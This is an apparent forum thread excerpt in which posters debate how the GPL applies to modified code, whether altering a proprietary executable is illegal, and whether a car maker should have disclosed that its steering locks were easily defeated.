Not at all. They're different animals, with different situations. As stated above, the GPL applies only to redistributed code. If I get a copy of Red Hat Linux and munge the kernel code to run faster on my local Frankensystem 2002, but I don't redistribute that code outside my business, the GPL never applies. Hacking WINWORD.EXE is always, under every circumstance, illegal, even if I then don't even run the modified executable. Just changing it is a violation.
Virg
For the first 5 (or 6) years that Saturn automobiles were sold in USA, they could be (and were) hot-wired with merely a pair of scissors. Cops knew it, Saturn knew it, the insurance industry knew it, teens who went for joy rides knew it. Folks who owned Saturn automobiles never learned it until theirs was taken on a joy ride.
Should Saturn have disclosed to its customers and potential customers that the lock on the steering wheel was inadequate? That the same lock was incapable of keeping even casual thieves out? That they knew the lock was deficient and continued to produce cars with the defective locks? I think so. In many countries, companies that do not provide reasonable theft preventative measure are liable for the thefts.
How does the fourth amendment apply?
~~~